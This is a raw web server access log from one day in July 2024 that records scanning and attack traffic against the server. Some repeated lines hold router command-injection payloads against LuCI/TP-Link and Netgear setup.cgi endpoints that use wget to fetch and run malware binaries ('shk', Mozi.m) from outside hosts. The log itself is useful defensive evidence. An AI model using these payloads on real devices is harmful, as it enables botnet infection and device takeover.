45.148.10.174 - - [05/Jul/2024:00:04:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [05/Jul/2024:00:04:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
117.220.146.94 - - [05/Jul/2024:00:22:54 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.220.146.94:38699/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 727
45.89.245.57 - - [05/Jul/2024:00:45:53 +0200] "GET / HTTP/1.1" 200 1895
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
87.121.69.27 - - [05/Jul/2024:02:09:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
91.238.181.22 - - [05/Jul/2024:02:25:32 +0200] "-" 400 1930
216.218.206.102 - - [05/Jul/2024:02:33:37 +0200] "GET / HTTP/1.1" 200 1895
216.218.206.66 - - [05/Jul/2024:02:34:12 +0200] "GET /favicon.ico HTTP/1.1" 404 729
216.218.206.118 - - [05/Jul/2024:02:34:40 +0200] "GET /?format=json HTTP/1.1" 200 1895
216.218.206.90 - - [05/Jul/2024:02:35:05 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
23.90.165.142 - - [05/Jul/2024:02:38:19 +0200] "GET / HTTP/1.1" 200 1895
194.59.31.99 - - [05/Jul/2024:02:55:19 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
45.148.10.174 - - [05/Jul/2024:03:33:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [05/Jul/2024:03:33:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
87.121.69.27 - - [05/Jul/2024:03:49:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
58.176.52.254 - - [05/Jul/2024:03:49:40 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
206.168.32.105 - - [05/Jul/2024:05:16:01 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.105 - - [05/Jul/2024:05:16:04 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.105 - - [05/Jul/2024:05:16:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729
205.210.31.239 - - [05/Jul/2024:05:47:39 +0200] "-" 400 1930
205.210.31.239 - - [05/Jul/2024:05:47:39 +0200] "-" 400 1930
87.121.69.27 - - [05/Jul/2024:05:47:46 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
94.102.56.99 - - [05/Jul/2024:05:56:38 +0200] "GET / HTTP/1.1" 200 1895
45.148.10.174 - - [05/Jul/2024:06:07:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [05/Jul/2024:06:07:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "-" 400 1930
167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "-" 400 1930
167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "GET / HTTP/1.1" 200 1895
167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
52.249.38.246 - - [05/Jul/2024:07:15:08 +0200] "-" 400 1930
78.108.177.54 - - [05/Jul/2024:07:24:33 +0200] "GET / HTTP/1.0" 200 1895
87.121.69.27 - - [05/Jul/2024:07:53:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
94.156.66.92 - - [05/Jul/2024:08:06:17 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804
167.94.146.54 - - [05/Jul/2024:08:55:47 +0200] "GET / HTTP/1.1" 200 1895
167.94.146.54 - - [05/Jul/2024:08:55:50 +0200] "GET / HTTP/1.1" 200 1895
167.94.146.54 - - [05/Jul/2024:08:55:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729
106.75.134.172 - - [05/Jul/2024:09:06:12 +0200] "GET /.git/config HTTP/1.1" 404 733
45.148.10.174 - - [05/Jul/2024:09:07:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [05/Jul/2024:09:07:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
178.215.236.52 - - [05/Jul/2024:09:26:15 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804
87.121.69.27 - - [05/Jul/2024:09:31:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
122.228.86.230 - - [05/Jul/2024:10:38:43 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [05/Jul/2024:11:00:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
65.49.1.15 - - [05/Jul/2024:11:11:32 +0200] "-" 400 1930
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:45 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:47 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:48 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:48 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:48 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:49 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:49 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:49 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:28:50 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:30:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735
174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:10:36 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:53 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:53 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:12:18:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
194.59.31.99 - - [05/Jul/2024:12:55:55 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
87.121.69.27 - - [05/Jul/2024:13:04:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
167.71.164.47 - - [05/Jul/2024:13:31:14 +0200] "-" 400 1930
167.71.164.47 - - [05/Jul/2024:13:31:15 +0200] "-" 400 1930
167.71.164.47 - - [05/Jul/2024:13:31:15 +0200] "GET / HTTP/1.1" 200 1895
167.71.164.47 - - [05/Jul/2024:13:31:15 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
94.156.66.81 - - [05/Jul/2024:13:50:16 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804
94.156.66.90 - - [05/Jul/2024:13:51:26 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804
13.64.211.24 - - [05/Jul/2024:14:17:09 +0200] "GET / HTTP/1.1" 200 1895
188.94.32.94 - - [05/Jul/2024:14:35:07 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.104 - - [05/Jul/2024:14:44:28 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.104 - - [05/Jul/2024:14:44:31 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.104 - - [05/Jul/2024:14:44:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729
175.30.48.82 - - [05/Jul/2024:15:15:09 +0200] "GET / HTTP/1.1" 200 1895
221.207.35.36 - - [05/Jul/2024:15:16:31 +0200] "GET / HTTP/1.1" 200 1895
1.24.16.114 - - [05/Jul/2024:15:16:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729
212.102.57.145 - - [05/Jul/2024:16:15:15 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 804
94.156.67.70 - - [05/Jul/2024:16:46:18 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
45.148.10.174 - - [05/Jul/2024:16:59:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [05/Jul/2024:16:59:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
87.121.69.27 - - [05/Jul/2024:17:09:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
182.31.94.35 - - [05/Jul/2024:18:15:45 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
198.235.24.186 - - [05/Jul/2024:18:53:12 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [05/Jul/2024:19:18:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
45.148.10.174 - - [05/Jul/2024:19:34:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [05/Jul/2024:19:34:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728
